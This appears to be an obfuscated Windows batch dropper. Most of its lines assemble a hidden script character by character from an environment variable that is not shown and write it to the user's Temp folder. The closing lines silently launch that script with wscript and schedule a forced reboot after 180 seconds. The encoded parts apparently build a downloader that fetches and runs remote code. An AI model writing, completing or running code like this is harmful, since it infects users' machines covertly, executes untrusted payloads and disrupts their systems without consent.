>>%uwcrnxl%  %ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~52,1%%ocvdubf:~49,1%%ocvdubf:~41,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~30,1%%ocvdubf:~26,1%%ocvdubf:~64,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~17,1%%ocvdubf:~52,1%%ocvdubf:~49,1%%ocvdubf:~41,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~0,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~53,1%%ocvdubf:~55,1%%ocvdubf:~52,1%%ocvdubf:~44,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~23,1%%ocvdubf:~51,1%%ocvdubf:~48,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~45,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~53,1%:%ocvdubf:~68,1%%ocvdubf:~68,1%%ocvdubf:~6,1%%ocvdubf:~7,1%%ocvdubf:~64,1%%ocvdubf:~5,1%%ocvdubf:~4,1%%ocvdubf:~64,1%%ocvdubf:~4,1%%ocvdubf:~3,1%%ocvdubf:~6,1%%ocvdubf:~64,1%%ocvdubf:~3,1%%ocvdubf:~11,1%%ocvdubf:~4,1%%ocvdubf:~68,1%%ocvdubf:~43,1%%ocvdubf:~44,1%%ocvdubf:~56,1%%ocvdubf:~55,1%%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~1,1%
>>%uwcrnxl%  %ocvdubf:~51,1%%ocvdubf:~50,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~54,1%%ocvdubf:~63,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~53,1%%ocvdubf:~55,1%%ocvdubf:~52,1%%ocvdubf:~44,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~58,1%%ocvdubf:~44,1%%ocvdubf:~51,1%%ocvdubf:~50,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~58,1%%ocvdubf:~59,1%%ocvdubf:~64,1%%ocvdubf:~63,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~1,1%
>>%uwcrnxl%  %ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~34,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~19,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~53,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~0,1%%ocvdubf:~1,1%%ocvdubf:~34,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~19,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~53,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~19,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~53,1%%ocvdubf:~29,1%%ocvdubf:~42,1%%ocvdubf:~54,1%%ocvdubf:~58,1%%ocvdubf:~42,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~64,1%%ocvdubf:~7,1%%ocvdubf:~64,1%%ocvdubf:~3,1%%ocvdubf:~1,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~34,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~19,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~53,1%%ocvdubf:~64,1%%ocvdubf:~52,1%%ocvdubf:~53,1%%ocvdubf:~42,1%%ocvdubf:~51,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~18,1%%ocvdubf:~16,1%%ocvdubf:~31,1%%ocvdubf:~1,1%,%ocvdubf:~65,1%%ocvdubf:~23,1%%ocvdubf:~51,1%%ocvdubf:~48,1%,%ocvdubf:~65,1%%ocvdubf:~17,1%%ocvdubf:~38,1%%ocvdubf:~49,1%%ocvdubf:~56,1%%ocvdubf:~42,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~34,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~19,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~53,1%%ocvdubf:~64,1%%ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~29,1%%ocvdubf:~42,1%%ocvdubf:~54,1%%ocvdubf:~58,1%%ocvdubf:~42,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~19,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~41,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~32,1%%ocvdubf:~56,1%%ocvdubf:~42,1%%ocvdubf:~55,1%-%ocvdubf:~12,1%%ocvdubf:~44,1%%ocvdubf:~42,1%%ocvdubf:~51,1%%ocvdubf:~57,1%%ocvdubf:~1,1%,%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~24,1%%ocvdubf:~52,1%%ocvdubf:~63,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~38,1%%ocvdubf:~68,1%%ocvdubf:~7,1%%ocvdubf:~64,1%%ocvdubf:~2,1%%ocvdubf:~65,1%%ocvdubf:~0,1%%ocvdubf:~34,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~41,1%%ocvdubf:~52,1%%ocvdubf:~60,1%%ocvdubf:~56,1%%ocvdubf:~65,1%%ocvdubf:~25,1%%ocvdubf:~31,1%%ocvdubf:~65,1%%ocvdubf:~8,1%%ocvdubf:~64,1%%ocvdubf:~3,1%;%ocvdubf:~65,1%%ocvdubf:~34,1%%ocvdubf:~26,1%%ocvdubf:~34,1%%ocvdubf:~8,1%%ocvdubf:~6,1%;%ocvdubf:~65,1%%ocvdubf:~31,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~41,1%%ocvdubf:~42,1%%ocvdubf:~51,1%%ocvdubf:~57,1%%ocvdubf:~68,1%%ocvdubf:~9,1%%ocvdubf:~64,1%%ocvdubf:~2,1%;%ocvdubf:~65,1%%ocvdubf:~55,1%%ocvdubf:~59,1%:%ocvdubf:~3,1%%ocvdubf:~3,1%%ocvdubf:~64,1%%ocvdubf:~2,1%%ocvdubf:~69,1%%ocvdubf:~65,1%%ocvdubf:~49,1%%ocvdubf:~46,1%%ocvdubf:~48,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~18,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~48,1%%ocvdubf:~52,1%%ocvdubf:~1,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~34,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~19,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~53,1%%ocvdubf:~64,1%%ocvdubf:~56,1%%ocvdubf:~42,1%%ocvdubf:~51,1%%ocvdubf:~41,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~1,1%
>>%uwcrnxl%  %ocvdubf:~30,1%%ocvdubf:~38,1%%ocvdubf:~59,1%%ocvdubf:~42,1%%ocvdubf:~13,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~62,1%%ocvdubf:~15,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~65,1%%ocvdubf:~51,1%%ocvdubf:~50,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~54,1%%ocvdubf:~63,1%,%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~34,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~19,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~53,1%%ocvdubf:~64,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~56,1%%ocvdubf:~53,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~56,1%%ocvdubf:~42,1%%ocvdubf:~13,1%%ocvdubf:~52,1%%ocvdubf:~41,1%%ocvdubf:~62,1%
>>%uwcrnxl%  %ocvdubf:~20,1%%ocvdubf:~43,1%%ocvdubf:~65,1%%ocvdubf:~0,1%%ocvdubf:~43,1%%ocvdubf:~56,1%%ocvdubf:~52,1%%ocvdubf:~64,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~16,1%%ocvdubf:~61,1%%ocvdubf:~46,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~56,1%%ocvdubf:~0,1%%ocvdubf:~51,1%%ocvdubf:~50,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~54,1%%ocvdubf:~63,1%%ocvdubf:~69,1%%ocvdubf:~69,1%%ocvdubf:~65,1%%ocvdubf:~31,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~51,1%
>>%uwcrnxl%  %ocvdubf:~65,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~65,1%%ocvdubf:~51,1%%ocvdubf:~50,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~54,1%%ocvdubf:~63,1%,%ocvdubf:~65,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~53,1%%ocvdubf:~55,1%%ocvdubf:~52,1%%ocvdubf:~44,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~50,1%
>>%uwcrnxl%  %ocvdubf:~65,1%%ocvdubf:~15,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~12,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~51,1%%ocvdubf:~50,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~54,1%%ocvdubf:~63,1%
>>%uwcrnxl%  %ocvdubf:~65,1%%ocvdubf:~15,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~12,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~34,1%%ocvdubf:~30,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~57,1%%ocvdubf:~64,1%%ocvdubf:~56,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~57,1%%ocvdubf:~17,1%%ocvdubf:~58,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~25,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~42,1%
>>%uwcrnxl%  %ocvdubf:~65,1%%ocvdubf:~53,1%%ocvdubf:~42,1%%ocvdubf:~44,1%%ocvdubf:~38,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~53,1%%ocvdubf:~55,1%%ocvdubf:~52,1%%ocvdubf:~44,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~50,1%
>>%uwcrnxl%  %ocvdubf:~65,1%%ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~25,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~34,1%%ocvdubf:~30,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~57,1%%ocvdubf:~64,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~0,1%%ocvdubf:~1,1%%ocvdubf:~34,1%%ocvdubf:~30,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~57,1%%ocvdubf:~64,1%%ocvdubf:~25,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~60,1%%ocvdubf:~52,1%%ocvdubf:~55,1%%ocvdubf:~48,1%%ocvdubf:~1,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~65,1%%ocvdubf:~44,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~43,1%%ocvdubf:~38,1%%ocvdubf:~65,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~53,1%%ocvdubf:~55,1%%ocvdubf:~52,1%%ocvdubf:~44,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~67,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~25,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~64,1%%ocvdubf:~32,1%%ocvdubf:~56,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~25,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~67,1%%ocvdubf:~1,1%%ocvdubf:~64,1%%ocvdubf:~61,1%%ocvdubf:~50,1%%ocvdubf:~49,1%%ocvdubf:~1,1%,%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~25,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~64,1%%ocvdubf:~32,1%%ocvdubf:~56,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~25,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~42,1%,%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~25,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~64,1%%ocvdubf:~14,1%%ocvdubf:~52,1%%ocvdubf:~50,1%%ocvdubf:~53,1%%ocvdubf:~58,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~25,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~42,1%,%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~56,1%%ocvdubf:~58,1%%ocvdubf:~49,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~42,1%
>>%uwcrnxl%  %ocvdubf:~65,1%%ocvdubf:~40,1%%ocvdubf:~52,1%%ocvdubf:~41,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~43,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~16,1%%ocvdubf:~9,1%%ocvdubf:~15,1%%ocvdubf:~13,1%%ocvdubf:~16,1%%ocvdubf:~16,1%%ocvdubf:~15,1%%ocvdubf:~14,1%%ocvdubf:~16,1%%ocvdubf:~15,1%%ocvdubf:~15,1%%ocvdubf:~12,1%%ocvdubf:~15,1%%ocvdubf:~16,1%%ocvdubf:~15,1%%ocvdubf:~5,1%%ocvdubf:~15,1%%ocvdubf:~11,1%%ocvdubf:~13,1%%ocvdubf:~7,1%%ocvdubf:~16,1%%ocvdubf:~2,1%%ocvdubf:~16,1%%ocvdubf:~14,1%%ocvdubf:~16,1%%ocvdubf:~14,1%%ocvdubf:~16,1%%ocvdubf:~10,1%%ocvdubf:~13,1%%ocvdubf:~4,1%%ocvdubf:~12,1%%ocvdubf:~9,1%%ocvdubf:~12,1%%ocvdubf:~9,1%%ocvdubf:~12,1%%ocvdubf:~11,1%%ocvdubf:~12,1%%ocvdubf:~17,1%%ocvdubf:~12,1%%ocvdubf:~17,1%%ocvdubf:~12,1%%ocvdubf:~8,1%%ocvdubf:~12,1%%ocvdubf:~11,1%%ocvdubf:~12,1%%ocvdubf:~11,1%%ocvdubf:~12,1%%ocvdubf:~8,1%%ocvdubf:~12,1%%ocvdubf:~15,1%%ocvdubf:~12,1%%ocvdubf:~10,1%%ocvdubf:~12,1%%ocvdubf:~8,1%%ocvdubf:~12,1%%ocvdubf:~11,1%%ocvdubf:~12,1%%ocvdubf:~11,1%%ocvdubf:~12,1%%ocvdubf:~17,1%%ocvdubf:~12,1%%ocvdubf:~9,1%%ocvdubf:~16,1%%ocvdubf:~3,1%%ocvdubf:~16,1%%ocvdubf:~8,1%%ocvdubf:~15,1%%ocvdubf:~14,1%%ocvdubf:~15,1%%ocvdubf:~15,1%%ocvdubf:~17,1%%ocvdubf:~2,1%%ocvdubf:~12,1%%ocvdubf:~8,1%%ocvdubf:~16,1%%ocvdubf:~10,1%%ocvdubf:~16,1%%ocvdubf:~2,1%%ocvdubf:~16,1%%ocvdubf:~10,1%%ocvdubf:~13,1%%ocvdubf:~7,1%%ocvdubf:~15,1%%ocvdubf:~11,1%%ocvdubf:~15,1%%ocvdubf:~7,1%%ocvdubf:~15,1%%ocvdubf:~5,1%%ocvdubf:~15,1%%ocvdubf:~12,1%%ocvdubf:~13,1%%ocvdubf:~7,1%%ocvdubf:~13,1%%ocvdubf:~11,1%%ocvdubf:~14,1%%ocvdubf:~16,1%%ocvdubf:~14,1%%ocvdubf:~13,1%%ocvdubf:~12,1%%ocvdubf:~10,1%%ocvdubf:~12,1%%ocvdubf:~13,1%%ocvdubf:~13,1%%ocvdubf:~7,1%%ocvdubf:~15,1%%ocvdubf:~12,1%%ocvdubf:~15,1%%ocvdubf:~7,1%%ocvdubf:~15,1%%ocvdubf:~5,1%%ocvdubf:~15,1%%ocvdubf:~13,1%%ocvdubf:~13,1%%ocvdubf:~7,1%%ocvdubf:~14,1%%ocvdubf:~15,1%%ocvdubf:~14,1%%ocvdubf:~6,1%%ocvdubf:~14,1%%ocvdubf:~14,1%%ocvdubf:~14,1%%ocvdubf:~12,1%%ocvdubf:~14,1%%ocvdubf:~9,1%%ocvdubf:~14,1%%ocvdubf:~8,1%%ocvdubf:~13,1%%ocvdubf:~7,1%%ocvdubf:~15,1%%ocvdubf:~13,1%%ocvdubf:~15,1%%ocvdubf:~7,1%%ocvdubf:~15,1%%ocvdubf:~15,1%%ocvdubf:~17,1%%ocvdubf:~3,1%%ocvdubf:~16,1%%ocvdubf:~14,1%%ocvdubf:~15,1%%ocvdubf:~15,1%%ocvdubf:~16,1%%ocvdubf:~17,1%%ocvdubf:~16,1%%ocvdubf:~7,1%%ocvdubf:~16,1%%ocvdubf:~17,1%%ocvdubf:~1,1%
>>%uwcrnxl%  %ocvdubf:~65,1%%ocvdubf:~44,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~54,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~43,1%%ocvdubf:~65,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~53,1%%ocvdubf:~55,1%%ocvdubf:~52,1%%ocvdubf:~44,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~67,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~25,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~64,1%%ocvdubf:~32,1%%ocvdubf:~56,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~25,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~67,1%%ocvdubf:~1,1%%ocvdubf:~64,1%%ocvdubf:~49,1%%ocvdubf:~52,1%%ocvdubf:~44,1%%ocvdubf:~1,1%,%ocvdubf:~65,1%%ocvdubf:~40,1%%ocvdubf:~52,1%%ocvdubf:~41,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~16,1%%ocvdubf:~49,1%%ocvdubf:~56,1%%ocvdubf:~42,1%
>>%uwcrnxl%  %ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~41,1%%ocvdubf:~65,1%%ocvdubf:~20,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~41,1%%ocvdubf:~65,1%%ocvdubf:~20,1%%ocvdubf:~43,1%
@echo off
cls
start wscript //Nologo %USERPROFILE%\Temp\%eytewmw%&& @echo off
start shutdown -r -t 180
ENDLOCAL
EXIT